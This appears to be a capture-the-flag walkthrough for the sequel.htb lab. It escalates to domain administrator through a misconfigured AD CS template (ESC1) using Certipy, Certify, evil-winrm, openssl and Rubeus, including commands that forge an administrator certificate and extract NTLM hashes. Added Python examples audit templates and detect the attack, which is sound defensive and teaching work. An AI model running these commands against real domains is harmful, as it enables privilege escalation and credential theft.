Exploit without a shell
View vulnerable certificates
certipy find -u ryan.cooper -p passw -target sequel.htb -text -stdout -vulnerable
Forge a new certificate
certipy-ad req -u ryan.cooper -p passw -target sequel.htb -upn administrator@sequel.htb -ca sequel-DC-CA -template UserAuthentication
Get the TGT and NTLM hash
certipy-ad auth -pfx administrator.pfx
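The `find -vulnerable` step works because the template meets a specific set of conditions (the "ESC1" pattern). The following is an added example, not part of these notes and not Certipy or Certify code: it evaluates those conditions over template records constructed inline in the shape of the LDAP attributes found under CN=Certificate Templates,CN=Public Key Services in the Configuration partition. The `enroll` list is an assumed, pre-resolved summary of which principals hold the Enroll right; a real audit would read all of this over LDAP.

```python
"""The five template settings that, together, make a template
ESC1-exploitable, as `certipy find -vulnerable` and
`Certify.exe find /vulnerable` report them.

Added example; template records are constructed below, and the
`enroll` key is this example's own summary of Enroll permissions.
"""

# msPKI-Certificate-Name-Flag bit: the enrollee may supply the subject/SAN.
CT_FLAG_ENROLLEE_SUPPLIES_SUBJECT = 0x00000001
# msPKI-Enrollment-Flag bit: every request waits for CA manager approval.
CT_FLAG_PEND_ALL_REQUESTS = 0x00000002

# EKUs that let a certificate authenticate a user (Kerberos PKINIT,
# Schannel client auth, smart-card logon); an empty EKU list means any use.
AUTH_EKUS = {
    "1.3.6.1.5.5.7.3.2",       # Client Authentication
    "1.3.6.1.5.2.3.4",         # PKINIT Client Authentication
    "1.3.6.1.4.1.311.20.2.2",  # Smart Card Logon
    "2.5.29.37.0",             # Any Purpose
}

# Principals treated as low-privileged when they hold Enroll.
LOW_PRIV_PRINCIPALS = {"Domain Users", "Domain Computers",
                       "Authenticated Users", "Everyone"}


def esc1_conditions(template):
    """Return the ESC1 conditions this template meets, as a list of strings."""
    met = []
    if template["msPKI-Certificate-Name-Flag"] & CT_FLAG_ENROLLEE_SUPPLIES_SUBJECT:
        met.append("enrollee supplies subject")
    if not template["msPKI-Enrollment-Flag"] & CT_FLAG_PEND_ALL_REQUESTS:
        met.append("no manager approval")
    if template["msPKI-RA-Signature"] == 0:
        met.append("no authorized signatures required")
    ekus = set(template["pKIExtendedKeyUsage"])
    if not ekus or ekus & AUTH_EKUS:
        met.append("authentication EKU")
    low_priv = sorted(set(template["enroll"]) & LOW_PRIV_PRINCIPALS)
    if low_priv:
        met.append("enrollable by " + ", ".join(low_priv))
    return met


def is_esc1(template):
    """ESC1 needs all five conditions at once."""
    return len(esc1_conditions(template)) == 5


def audit(templates):
    """Map each ESC1-exploitable template name to the conditions it meets."""
    return {t["name"]: esc1_conditions(t) for t in templates if is_esc1(t)}


# Constructed sample data: a template configured the way the notes describe,
# beside a copy with the two settings changed that break the chain.
TEMPLATES = [
    {
        "name": "UserAuthentication",
        "msPKI-Certificate-Name-Flag": 0x1,
        "msPKI-Enrollment-Flag": 0x0,
        "msPKI-RA-Signature": 0,
        "pKIExtendedKeyUsage": ["1.3.6.1.5.5.7.3.2", "1.3.6.1.5.5.7.3.4"],
        "enroll": ["Domain Admins", "Domain Users"],
    },
    {
        "name": "UserAuthentication-Fixed",
        "msPKI-Certificate-Name-Flag": 0x0,  # subject/SAN built from AD, not from the request
        "msPKI-Enrollment-Flag": 0x2,        # CA manager must approve each request
        "msPKI-RA-Signature": 0,
        "pKIExtendedKeyUsage": ["1.3.6.1.5.5.7.3.2", "1.3.6.1.5.5.7.3.4"],
        "enroll": ["Domain Admins", "Domain Users"],
    },
]

if __name__ == "__main__":
    for name, conditions in audit(TEMPLATES).items():
        print(f"ESC1: {name}: " + "; ".join(conditions))
```

Clearing the "enrollee supplies subject" flag alone is what removes the ability to request a certificate for another account; requiring manager approval is a second, independent break in the chain, which is why the fixed copy fails on two conditions rather than one.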
Exploit via shell on machine
.\Certify.exe find /vulnerable
The output shows that Domain Users also hold enrollment rights on the template, which is what makes it usable by any member of that group.
We request a certificate as our own user but set the alternative name (altname) to administrator, so the issued certificate authenticates as the administrator.
.\Certify.exe request /ca:dc.sequel.htb\sequel-DC-CA /template:UserAuthentication /altname:administrator
If port 5986 (WinRM over HTTPS) is open:
Copy the private key block from Certify's output into a key.pem file and the certificate block into a key.cert file.
evil-winrm -S -c key.cert -k key.pem -i dc.sequel.htb
If port 5986 is closed:
Put the full Certify output (private key and certificate) into a cert.pem file and convert it to a PFX.
openssl pkcs12 -in cert.pem -keyex -CSP "Microsoft Enhanced Cryptographic Provider v1.0" -export -out cert.pfx
Upload Rubeus and the newly made cert.pfx to the machine.
.\Rubeus.exe asktgt /user:administrator /certificate:C:\programdata\cert.pfx /getcredentials /show /nowrap
/getcredentials /show /nowrap prints the user's NTLM hash alongside the ticket.
We can then log in with either the ticket or the NTLM hash.
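Both branches above leave the same trail on the domain: a certificate issued to one account but carrying another account's UPN in its SAN, then a Kerberos TGT obtained with that certificate. The following is an added example for the defender's side, not part of these notes and not Rubeus or Certipy code. Its inputs are constructed inline: issued-certificate rows in the shape of the fields certutil -view exposes from the CA database (requester name, template, SAN UPN; the dictionary keys are this example's own), and Security log Event 4768 records reduced to the fields used here. The IP addresses and request IDs are made up.

```python
"""Correlate CA issuance records with DC Kerberos events to spot
a certificate requested for another account and then used for PKINIT.

Added example; all records below are constructed. In Event 4768,
Pre-Authentication Type 16 is PA-PK-AS-REQ, a certificate-based
(PKINIT) TGT request, which is how the /nowrap ticket above is obtained.
"""

PA_PK_AS_REQ = 16

# Constructed: rows as a defender would export them from the CA database.
ISSUED = [
    {"request_id": 41, "requester": "SEQUEL\\ryan.cooper",
     "template": "UserAuthentication", "san_upn": "ryan.cooper@sequel.htb"},
    {"request_id": 42, "requester": "SEQUEL\\ryan.cooper",
     "template": "UserAuthentication", "san_upn": "administrator@sequel.htb"},
    {"request_id": 43, "requester": "SEQUEL\\DC$",
     "template": "DomainController", "san_upn": None},
]

# Constructed: Event 4768 (TGT requested) records from the DC Security log.
TGT_EVENTS = [
    {"event_id": 4768, "account": "ryan.cooper", "preauth_type": 2,
     "client_ip": "10.10.14.5"},   # password-based pre-auth, normal
    {"event_id": 4768, "account": "administrator", "preauth_type": PA_PK_AS_REQ,
     "client_ip": "10.10.14.5"},   # certificate-based TGT for administrator
]


def account_of(name):
    """'DOMAIN\\user' or 'user@realm' -> bare account name, case-folded."""
    bare = name.split("\\", 1)[-1]
    return bare.split("@", 1)[0].lower()


def san_mismatches(rows):
    """Rows whose SAN UPN names a different account than the requester."""
    return [r for r in rows
            if r["san_upn"] and account_of(r["san_upn"]) != account_of(r["requester"])]


def pkinit_logons(events, account):
    """4768 events where `account` obtained a TGT via certificate pre-auth."""
    return [e for e in events
            if e["event_id"] == 4768 and e["preauth_type"] == PA_PK_AS_REQ
            and e["account"].lower() == account]


def correlate(rows, events):
    """Attach to each suspicious issuance the PKINIT logons of the named account."""
    alerts = []
    for r in san_mismatches(rows):
        victim = account_of(r["san_upn"])
        alerts.append({
            "request_id": r["request_id"],
            "requester": account_of(r["requester"]),
            "impersonated": victim,
            "template": r["template"],
            "pkinit_logons": pkinit_logons(events, victim),
        })
    return alerts


if __name__ == "__main__":
    for a in correlate(ISSUED, TGT_EVENTS):
        used = ", ".join(e["client_ip"] for e in a["pkinit_logons"]) or "not yet used"
        print(f"request {a['request_id']}: {a['requester']} obtained a "
              f"{a['template']} certificate for {a['impersonated']}; "
              f"PKINIT logons from: {used}")
```

The issuance record alone is the high-confidence signal, since a legitimate enrollment's SAN matches the requester; the 4768 correlation tells you whether the certificate has already been turned into a ticket, and from where.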